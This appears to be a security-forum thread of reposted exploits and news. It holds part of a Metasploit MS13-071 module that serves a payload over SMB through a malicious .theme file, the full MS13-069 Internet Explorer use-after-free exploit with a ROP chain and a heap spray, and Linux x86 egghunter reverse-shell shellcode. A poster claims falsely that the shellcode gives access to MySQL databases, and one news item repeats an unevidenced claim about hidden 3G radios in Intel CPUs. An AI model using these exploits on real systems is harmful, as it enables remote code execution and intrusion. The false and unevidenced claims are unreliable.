3 pkt['Payload'].v['AndX'] = 0x75 pkt['Payload'].v['Reserved1'] = 00 pkt['Payload'].v['AndXOffset'] = 96 pkt['Payload'].v['Action'] = 0x1 # Logged in as Guest pkt['Payload'].v['Payload'] = Rex::Text.to_unicode("Unix", 'utf-16be') + "\x00\x00" 
+ # Native OS # Samba signature Rex::Text.to_unicode("Samba 3.4.7", 'utf-16be') + "\x00\x00" + # Native LAN Manager # Samba signature Rex::Text.to_unicode("WORKGROUP", 'utf-16be') + "\x00\x00\x00" + # Primary DOMAIN # Samba signature tree_connect_response = "" tree_connect_response << [7].pack("C") # Tree Connect Response : WordCount tree_connect_response << [0xff].pack("C") # Tree Connect Response : AndXCommand tree_connect_response << [0].pack("C") # Tree Connect Response : Reserved tree_connect_response << [0].pack("v") # Tree Connect Response : AndXOffset tree_connect_response << [0x1].pack("v") # Tree Connect Response : Optional Support tree_connect_response << [0xa9].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0x12].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [13].pack("v") # Tree Connect Response : ByteCount tree_connect_response << "A:\x00" # Service tree_connect_response << "#{Rex::Text.to_unicode("NTFS")}\x00\x00" # Extra byte parameters # Fix the Netbios Session Service Message Length # to have into account the tree_connect_response, # need to do this because there isn't support for # AndX still my_pkt = pkt.to_s + tree_connect_response original_length = my_pkt[2, 2].unpack("n").first original_length = original_length + tree_connect_response.length my_pkt[2, 2] = [original_length].pack("n") c.put(my_pkt) end def smb_cmd_create(c, buff) pkt = CONST::SMB_CREATE_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['Payload'] =~ /#{Rex::Text.to_unicode("#{@scr_file}\x00")}/ pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 42 
pkt['Payload'].v['AndX'] = 0xff # no further commands pkt['Payload'].v['OpLock'] = 0x2 # No need to track fid here, we're just offering one file pkt['Payload'].v['FileID'] = rand(0x7fff) + 1 # To avoid fid = 0 pkt['Payload'].v['Action'] = 0x1 # The file existed and was opened pkt['Payload'].v['CreateTimeLow'] = @lo pkt['Payload'].v['CreateTimeHigh'] = @hi pkt['Payload'].v['AccessTimeLow'] = @lo pkt['Payload'].v['AccessTimeHigh'] = @hi pkt['Payload'].v['WriteTimeLow'] = @lo pkt['Payload'].v['WriteTimeHigh'] = @hi pkt['Payload'].v['ChangeTimeLow'] = @lo pkt['Payload'].v['ChangeTimeHigh'] = @hi pkt['Payload'].v['Attributes'] = 0x80 # Ordinary file pkt['Payload'].v['AllocLow'] = 0x100000 pkt['Payload'].v['AllocHigh'] = 0 pkt['Payload'].v['EOFLow'] = @exe.length pkt['Payload'].v['EOFHigh'] = 0 pkt['Payload'].v['FileType'] = 0 pkt['Payload'].v['IPCState'] = 0x7 pkt['Payload'].v['IsDirectory'] = 0 c.put(pkt.to_s) else pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 # OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_read(c, buff) pkt = CONST::SMB_READ_PKT.make_struct pkt.from_s(buff) offset = pkt['Payload'].v['Offset'] length = pkt['Payload'].v['MaxCountLow'] pkt = CONST::SMB_READ_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_READ_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 12 pkt['Payload'].v['AndX'] = 0xff # no more commands pkt['Payload'].v['Remaining'] = 0xffff pkt['Payload'].v['DataLenLow'] = length pkt['Payload'].v['DataOffset'] = 59 pkt['Payload'].v['DataLenHigh'] = 0 pkt['Payload'].v['Reserved3'] = 0 pkt['Payload'].v['Reserved4'] = 6 pkt['Payload'].v['ByteCount'] = length pkt['Payload'].v['Payload'] = 
@exe[offset, length] c.put(pkt.to_s) end def smb_cmd_trans(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) sub_command = pkt['Payload'].v['SetupData'].unpack("v").first case sub_command when 0x5 # QUERY_PATH_INFO smb_cmd_trans_query_path_info(c, buff) when 0x1 # FIND_FIRST2 smb_cmd_trans_find_first2(c, buff) else pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000225 # NT_STATUS_NOT_FOUND c.put(pkt.to_s) end end def smb_cmd_trans_query_path_info(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['SetupData'].length < 16 # if QUERY_PATH_INFO_PARAMETERS doesn't include a file name, # return a Directory answer pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 2 pkt['Payload'].v['DataCountTotal'] = 40 pkt['Payload'].v['ParamCount'] = 2 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 40 pkt['Payload'].v['DataOffset'] = 60 pkt['Payload'].v['Payload'] = "\x00" + # Padding # QUERY_PATH_INFO Parameters "\x00\x00" + # EA Error Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change "\x10\x00\x00\x00" + # File attributes => directory "\x00\x00\x00\x00" # Unknown c.put(pkt.to_s) else # if QUERY_PATH_INFO_PARAMETERS includes a file name, # returns an object name not found error pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 
pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 #OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_trans_find_first2(c, buff) pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) file_name = Rex::Text.to_unicode(@scr_file) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 10 pkt['Payload'].v['DataCountTotal'] = 94 + file_name.length pkt['Payload'].v['ParamCount'] = 10 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 94 + file_name.length pkt['Payload'].v['DataOffset'] = 68 pkt['Payload'].v['Payload'] = "\x00" + # Padding # FIND_FIRST2 Parameters "\xfd\xff" + # Search ID "\x01\x00" + # Search count "\x01\x00" + # End Of Search "\x00\x00" + # EA Error Offset "\x00\x00" + # Last Name Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [94 + file_name.length].pack("V") + # Next Entry Offset "\x00\x00\x00\x00" + # File Index [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change [@exe.length].pack("V") + "\x00\x00\x00\x00" + # End Of File "\x00\x00\x10\x00\x00\x00\x00\x00" + # Allocation size "\x80\x00\x00\x00" + # File attributes => directory [file_name.length].pack("V") + # File name len "\x00\x00\x00\x00" + # EA List Lenght "\x00" + # Short file lenght "\x00" + # Reserved ("\x00" * 24) + file_name c.put(pkt.to_s) end end Sursa: MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution ? Packet Storm
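Stripped of the Ruby scaffolding, the file the module writes is just an ordinary desktop theme whose [boot] section points the screen saver at a remote SMB share. A minimal sketch of the malicious .theme, with a placeholder host and share name in place of the module's generated UNC path:

```ini
; Minimal malicious .theme sketch (host and share names are hypothetical)
[Theme]
DisplayName=@themeui.dll,-2016

[Control Panel\Desktop]
ScreenSaveActive=0

; The vulnerable setting: SCRNSAVE.EXE accepts an arbitrary path,
; including a UNC path, so viewing the "Screen Saver" tab loads and
; executes the attacker's .scr over SMB
[boot]
SCRNSAVE.EXE=\\192.168.1.10\share\payload.scr

[MasterThemeSelector]
MTSM=DABJDKT
```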
-
MS13-069 Microsoft Internet Explorer CCaret Use-After-Free Authored by corelanc0d3r, sinn3r | Site metasploit.com This Metasploit module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code execution under the context of the user. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. 
In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'corelanc0d3r', # Vuln discovery & PoC (@corelanc0d3r) 'sinn3r' # Metasploit (@_sinn3r) ], 'References' => [ [ 'CVE', '2013-3205' ], [ 'OSVDB', '97094' ], [ 'MSB', 'MS13-069' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-217/' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ # Win 7 target on hold until we have a stable custom spray for it 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'TargetAddr' => 0x1ec20101, # Allocs @ 1ec20020 (+0xe1 bytes to be null-byte free) - in ecx 'PayloadAddr' => 0x1ec20105, # where the ROP payload begins 'Pivot' => 0x77C4FA1A, # mov esp,ebx; pop ebx; ret 'PopESP' => 0x77C37422, # pop esp; ret (pivot to a bigger space) 'Align' => 0x77c4d801 # add esp, 0x2c; ret (ROP gadget to jmp over pivot gadget) } ] ], 'Payload' => { # Our property sprays dislike null bytes 'BadChars' => "\x00", # Fix the stack again before the payload is executed. # If we don't do this, meterpreter fails due to a bad socket. 
'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000 # Fall back to the previous allocation so we have plenty of space # for the decoder to use 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Sep 10 2013", 'DefaultTarget' => 0)) end def get_target(agent) return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) return t end end nil end def get_payload(t) rop = [ 0x77c1e844, # POP EBP # RETN [msvcrt.dll] 0x77c1e844, # skip 4 bytes [msvcrt.dll] 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] 0xffffffff, 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] 0x77c3048a, # POP EDI # RETN [msvcrt.dll] 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] 0x77c46efb, # POP ESI # RETN [msvcrt.dll] 0x77c2aacc, # JMP [EAX] [msvcrt.dll] 0x77c3b860, # POP EAX # RETN [msvcrt.dll] 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] ].pack("V*") # This data should appear at the beginning of the target address (see TargetAddr in 
metadata) p = '' p << rand_text_alpha(225) # Padding to avoid null byte addr p << [t['TargetAddr']].pack("V*") # For mov ecx,dword ptr [eax] p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr) p << [t['Pivot']].pack("V*") # Stack pivot p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment p << rop # ROP chain p << payload.encoded # Actual payload return p end # # Notes: # * A custom spray is used (see function putPayload), because document.write() keeps freeing # our other sprays like js_property_spray or the heaplib + substring approach. This spray # seems unstable for Win 7, we'll have to invest more time on that. # * Object size = 0x30 # def get_html(t) js_payload_addr = ::Rex::Text.to_unescape([t['PayloadAddr']].pack("V*")) js_target_addr = ::Rex::Text.to_unescape([t['TargetAddr']].pack("V*")) js_pop_esp = ::Rex::Text.to_unescape([t['PopESP']].pack("V*")) js_payload = ::Rex::Text.to_unescape(get_payload(t)) js_rand_dword = ::Rex::Text.to_unescape(rand_text_alpha(4)) html = %Q|<!DOCTYPE html> <html> <head> <script> var freeReady = false; function getObject() { var obj = ''; for (i=0; i < 11; i++) { if (i==1) { obj += unescape("#{js_pop_esp}"); } else if (i==2) { obj += unescape("#{js_payload_addr}"); } else if (i==3) { obj += unescape("#{js_target_addr}"); } else { obj += unescape("#{js_rand_dword}"); } } obj += "\\u4545"; return obj; } function emptyAllocator(obj) { for (var i = 0; i < 40; i++) { var e = document.createElement('div'); e.className = obj; } } function spray(obj) { for (var i = 0; i < 50; i++) { var e = document.createElement('div'); e.className = obj; document.appendChild(e); } } function putPayload() { var p = unescape("#{js_payload}"); var block = unescape("#{js_rand_dword}"); while (block.length < 0x80000) block += block; block = p + block.substring(0, (0x80000-p.length-6)/2); for (var i = 0; i < 0x300; i++) { var e = document.createElement('div'); e.className = block; document.appendChild(e); } } 
function trigger() { if (freeReady) { var obj = getObject(); emptyAllocator(obj); document.write("#{rand_text_alpha(1)}"); spray(obj); putPayload(); } } window.onload = function() { document.body.contentEditable = 'true'; document.execCommand('InsertInputPassword'); document.body.innerHTML = '#{rand_text_alpha(1)}'; freeReady = true; } </script> </head> <body onbeforeeditfocus="trigger()"> </body> </html> | html.gsub(/^\x20\x20\x20\x20/, '') end def on_request_uri(cli, request) agent = request.headers['User-Agent'] t = get_target(agent) unless t print_error("Not a suitable target: #{agent}") send_not_found(cli) return end html = get_html(t) print_status("Sending exploit...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end end =begin In mshtml!CCaret::UpdateScreenCaret function: .text:63620F82 mov ecx, [eax] ; crash .text:63620F84 lea edx, [esp+110h+var_A4] .text:63620F88 push edx .text:63620F89 push eax .text:63620F8A call dword ptr [ecx+2Ch] =end Sursa: MS13-069 Microsoft Internet Explorer CCaret Use-After-Free ? Packet Storm
-
Linux / x86 Multi-Egghunter Shellcode
Authored by Ryan Fenno

This is multi-egghunter Linux/x86 shellcode.

/*
 Title: Multi-Egghunter
 Author: Ryan Fenno (@ryanfenno)
 Date: 20 September 2013
 Tested on: Linux/x86 (Ubuntu 12.0.3)

 Description: This entry represents an extension of skape's sigaction(2)
 egghunting method [1] to multiple eggs. It is similar in spirit to
 BJ 'SkyLined' Wever's omelet shellcode for Win32 [2]. The
 proof-of-concept presented here splits a reverse TCP bind shell [3]
 into two parts. The egghunter is not only responsible for finding the
 two eggs, but also for executing them in the correct order. It is
 readily extendable to any (reasonable) number of eggs.

 References:
 [1] skape, "Safely Searching Process Virtual Address Space",
     www.hick.org/code/skape/papers/egghunt-shellcode.pdf
 [2] Wever, Berend-Jan, "w32-SEH-omelet-shellcode",
     http://code.google.com/p/w32-seh-omelet-shellcode/
 [3] Willis, R. "reversetcpbindshell",
     http://shell-storm.org/shellcode/files/shellcode-849.php
*/

#include <stdio.h>

#define MARKER "\x93\x51\x93\x59"
#define TAG1   "\x01\x51\x93\x59" // easiest to use latter three bytes
#define TAG2   "\x02\x51\x93\x59" // of MARKER for latter three of TAGs

// first egg/tag/shellcode
#define IPADDR "\xc0\xa8\x7a\x01" // 192.168.122.1
#define PORT   "\xab\xcd"         // 43981

unsigned char shellcode1[] =
MARKER
TAG1
//SHELLCODE1
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x96\xb0\x66\xb3\x03\x68" IPADDR "\x66\x68" PORT "\x66"
"\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80"
// perform the jump
"\x83\xc4\x20\x5f\x83\xec\x24\xff\xe7"
;

/*
global _start
section .text
_start:
    xor ebx, ebx
    mul ebx
    mov al, 0x66        ; socketcall() <linux/net.h>
    inc ebx             ; socket()
    push edx            ; arg3 :: protocol = 0
    push ebx            ; arg2 :: SOCK_STREAM = 1
    push byte 0x2       ; arg1 :: AF_INET = 2
    mov ecx, esp
    int 0x80
    xchg eax, esi       ; save clnt_sockfd in esi
    mov al, 0x66        ; socketcall()
    mov bl, 0x3         ; connect()
    ; build sockaddr_in struct (srv_addr)
    push dword 0x017AA8C0 ; IPv4 address 192.168.122.1 in hex (little endian)
    push word 0x697a    ; TCP port 0x7a69 = 31337
    push word 0x2       ; AF_INET = 2
    mov ecx, esp        ; pointer to sockaddr_in struct
    push dword 0x10     ; arg3 :: sizeof(struct sockaddr) = 16 [32-bits]
    push ecx            ; arg2 :: pointer to sockaddr_in struct
    push esi            ; arg1 :: clnt_sockfd
    mov ecx, esp
    int 0x80
    ;---- perform the jump
    ; looking at the stack at this point, the target for the jump
    ; is at $esp+0x20, so...
    add esp, 0x20
    pop edi
    sub esp, 0x24
    jmp edi
*/

// second egg/tag/shellcode
unsigned char shellcode2[] =
MARKER
TAG2
//SHELLCODE2
"\x5b\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89"
"\xe2\x53\x89\xe1\xcd\x80"
;

/*
global _start
section .text
_start:
    pop ebx             ; arg1 :: clnt_sockfd
    push 0x2
    pop ecx             ; loop from 2 to 0
dup2loop:
    mov byte al, 0x3F   ; dup2(2)
    int 0x80
    dec ecx
    jns dup2loop        ; loop ends when ecx == -1
    xor eax, eax
    mov byte al, 0x0B   ; execve(2)
    push edx            ; null terminator
    push 0x68732f2f     ; "hs//"
    push 0x6e69622f     ; "nib/"
    mov ebx, esp        ; arg1 :: "/bin/sh\0"
    push edx            ; null terminator
    mov edx, esp        ; arg3 :: envp = NULL array
    push ebx
    mov ecx, esp        ; arg2 :: argv array (ptr to string)
    int 0x80
*/

unsigned char egghunter[] =
"\x6a\x02\x59\x57\x51\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43"
"\x58\xcd\x80\x3c\xf2\x74\xf1\xb8" MARKER "\x89\xcf\xaf"
"\x75\xec\x89\xcb\x59\x20\xc8\xaf\x51\x89\xd9\x75\xe1\x59\xe2"
"\xd5\xff\xe7";

/*
global _start
section .text
_start:
    push byte 0x2       ; number of eggs
    pop ecx
eggLoop:
    push edi            ; memory location of ecx-th piece; first of
                        ; these is meaningless
    push ecx            ; save counter
    xor ecx, ecx        ; initialize ecx for memory search
fillOnes:
    or cx, 0xfff
shiftUp:
    inc ecx
    push byte 0x43      ; sigaction(2)
    pop eax
    int 0x80
    cmp al, 0xf2
    jz fillOnes
    mov eax, 0x59935193 ; marker
    mov edi, ecx
    scasd               ; advances edi by 0x4 if there is a match;
                        ; assumes direction flag (DF) is not set
    jnz shiftUp
    mov ebx, ecx        ; save off ecx in case we need to keep looking
    pop ecx             ; restore counter
    and al, cl          ; tag in eax
    scasd
    push ecx
    mov ecx, ebx
    jnz shiftUp
    pop ecx
    loop eggLoop
    jmp edi
*/

void main()
{
    printf("egghunter length: %d\n", sizeof(egghunter)-1);
    printf("shellcode1 length: %d\n", sizeof(shellcode1)-1);
    printf("shellcode2 length: %d\n", sizeof(shellcode2)-1);
    ((int(*)())egghunter)();
}

Sursa: Linux / x86 Multi-Egghunter Shellcode ? Packet Storm

I posted it because it's well documented. For those who don't know what shellcode is: you can use the code above to gain access to the MySQL databases of sites vulnerable to MyShellcode Injection.
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs
Nytro replied to Nytro's topic in Stiri securitate
PC disable can be triggered locally or remotely—an Internet or LAN connection is not necessary—under the following circumstances: - Excessive end-user attempts to log into the system. - The laptop misses its rendezvous time with the server (electronic check-in over the Internet), thereby issuing a local poison pill. • The IT administrator can send a poison pill remotely to the stolen laptop across the Internet, intranet, or Short Messaging Service (SMS) -
Return-Oriented-Programming Authored by Saif El-Sherei Whitepaper called Return-Oriented-Programming (ROP FTW). Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/return-oriented-programming.pdf
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs
Nytro replied to Nytro's topic in Stiri securitate
You're right, but how does the anti-theft on Intel chips work? It's an idea that is hard to prove; we don't have to believe it, but we should take it into consideration and keep in mind that something like this is, with certainty, possible.
Off-By-One Exploitation Tutorial Authored by Saif El-Sherei This whitepaper is called Off-By-One Exploitation Tutorial. An off-by-one vulnerability, in general, means that if an attacker supplies input of a certain length and the program has an incorrect length check, the program will write one byte outside the bounds of the space allocated to hold that input, causing one of two scenarios depending on the input. Download: http://packetstormsecurity.com/files/download/123361/offbyone-tutorial.pdf
-
Integer overflow/underflow exploitation tutorial
By Saif El Sherei
www.elsherei.com

Introduction:

I decided to get a bit more into Linux exploitation, so I thought it would be nice to document this, as a good friend once said: "you think you understand something until you try to teach it". This is my first try at writing papers. This paper is my understanding of the subject. I understand it might not be complete; I am open to suggestions and modifications. I hope this project helps others as it helped me. This paper is purely for education purposes.

Note: the exploitation methods explained in the tutorial below will not work on modern systems due to NX, ASLR, and modern kernel security mechanisms. If we continue this series, we will have a tutorial on bypassing some of these controls.

What is an integer?

An integer in computing is a variable holding a whole number, with no fractional part. The size of an int depends on the architecture, so on the i386 arch (32-bit) an int is 32 bits. An integer is represented in memory in binary.

Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/overflowunderflow-tutorial.pdf
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs

Tinfoil hat brigade say every PC is on mobile networks, even when powered down

By Richard Chirgwin, 23rd September 2013

Intel has apparently turned up one of the holiest of holy grails in the tech sector, accidentally creating a zero-power-consumption on-chip 3G communications platform as an NSA backdoor.

The scoop comes courtesy of tinfoil socialist site Popular Resistance, in this piece written by freelance truther Jim Stone, who has just discovered the wake-on-LAN capabilities in vPro processors. He writes:

"The new Intel Core vPro processors contain a new remote access feature which allows 100 percent remote access to a PC 100 percent of the time, even if the computer is turned off. Core vPro processors contain a second physical processor embedded within the main processor which has it's own operating system embedded on the chip itself. As long as the power supply is available and in working condition, it can be woken up by the Core vPro processor, which runs on the system's phantom power and is able to quietly turn individual hardware components on and access anything on them."

A little background: Popular Resistance was formed in 2011 and was part of the 'Occupy' movement, having done its bit in Washington DC. It now promotes an anti-capitalist agenda.

Back to Stone, who says Intel can do all the stuff vPro enables thanks to an undocumented 3G radio buried in its chips, one that apparently extends wake-on-LAN to wake-on-mobile:

"Core vPro processors work in conjunction with Intel's new Anti Theft 3.0, which put 3g connectivity into every Intel CPU after the Sandy Bridge version of the I3/5/7 processors. Users do not get to know about that 3g connection, but it IS there," he writes, "anti theft 3.0 always has that 3G connection on also, even if the computer is turned off" (emphasis added).

No evidence is offered for the assertions detailed above.
And with that, El Reg will now happily open the floor to the commentards … ® Sursa: 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs • The Register
-
If you really have nothing better to do with those 20 euros, buy me drinks with them.
-
Researchers can slip an undetectable trojan into Intel's Ivy Bridge CPUs

New technique bakes super stealthy hardware trojans into chip silicon.

by Dan Goodin - Sept 18, 2013

Scientists have developed a technique to sabotage the cryptographic capabilities included in Intel's Ivy Bridge line of microprocessors. The technique works without being detected by built-in tests or physical inspection of the chip.

The proof of concept comes eight years after the US Department of Defense voiced concern that integrated circuits used in crucial military systems might be altered in ways that covertly undermined their security or reliability. The report was the starting point for research into techniques for detecting so-called hardware trojans. But until now, there has been little study into just how feasible it would be to alter the design or manufacturing process of widely used chips to equip them with secret backdoors.

In a recently published research paper, scientists devised two such backdoors they said adversaries could feasibly build into processors to surreptitiously bypass cryptographic protections provided by the computer running the chips. The paper is attracting interest following recent revelations that the National Security Agency is exploiting weaknesses deliberately built into widely used cryptographic technologies so analysts can decode vast swaths of Internet traffic that otherwise would be unreadable.

The attack against the Ivy Bridge processors sabotages the random number generator (RNG) instructions Intel engineers added to the processor. The exploit works by severely reducing the amount of entropy the RNG normally uses, from 128 bits to 32 bits. The hack is similar to stacking a deck of cards during a game of Bridge. Keys generated with an altered chip would be so predictable an adversary could guess them with little time or effort required.
The severely weakened RNG isn't detected by any of the "Built-In Self-Tests" required for the SP 800-90 and FIPS 140-2 compliance certifications mandated by the National Institute of Standards and Technology. The tampering is also undetectable to the type of physical inspection that's required to ensure a chip is "golden," a term applied to integrated circuits known to not include malicious modifications.

Christof Paar, one of the researchers, told Ars the proof-of-concept hardware trojan relies on a technique that requires low-level changes to only a "few dozen transistors." That represents a minuscule percentage of the more than 1 billion transistors overall. The tweaks alter the transistors' and gates' "doping polarity," a change that adds a small number of atoms of material to the silicon. Because the changes are so subtle, they don't show up in physical inspections used to certify golden chips.

"We want to stress that one of the major advantages of the proposed dopant trojan is that [it] cannot be detected using optical reverse-engineering since we only modify the dopant masks," the researchers reported in their paper. "The introduced trojans are similar to the commercially deployed code-obfuscation methods which also use different dopant polarity to prevent optical reverse-engineering. This suggests that our dopant trojans are extremely stealthy as well as practically feasible."

Besides being stealthy, the alterations can happen at a minimum of two points in the supply chain. That includes (1) during manufacturing, where someone makes changes to the doping, or (2) a malicious designer making changes to the layout file of an integrated circuit before it goes to manufacturing. In addition to the Ivy Bridge processor, the researchers applied the dopant technique to lodge a trojan in a chip prototype that was designed to withstand so-called side channel attacks.
The result: cryptographic keys could be correctly extracted on the tampered device with a correlation close to 1. (In fairness, they found a small vulnerability in the trojan-free chip they used for comparison, but it was unaffected by the trojan they introduced.)

The paper was authored by Georg T. Becker of the University of Massachusetts, Amherst; Francesco Regazzoni of TU Delft, the Netherlands, and ALaRI, University of Lugano, Switzerland; Christof Paar of the Horst Görtz Institute for IT Security, Ruhr-Universität Bochum, Germany, and UMass; and Wayne P. Burleson of UMass.

In an e-mail, Paar stressed that no hardware trojans have ever been found circulating in the real world and that the techniques devised in the paper are mere proofs of concept. Still, the demonstration suggests the covert backdoors are technically feasible. It wouldn't be surprising to see chip makers and certification groups respond with new ways to detect these subtle changes.

Sursa: Researchers can slip an undetectable trojan into Intel’s Ivy Bridge CPUs | Ars Technica
-
NSA: Snowden was just doing his job

Summary: More details emerge on how Edward Snowden was able to gain access to and copy so much secret information. His job provided the perfect cover for his illegal activities. In response, the NSA is making like the TSA and fighting the last war.

By Larry Seltzer for Zero Day | September 19, 2013

Interviews with two NSA officials by National Public Radio reveal a tragic irony of Edward Snowden's theft and leaking of classified documents: he was just doing his job.

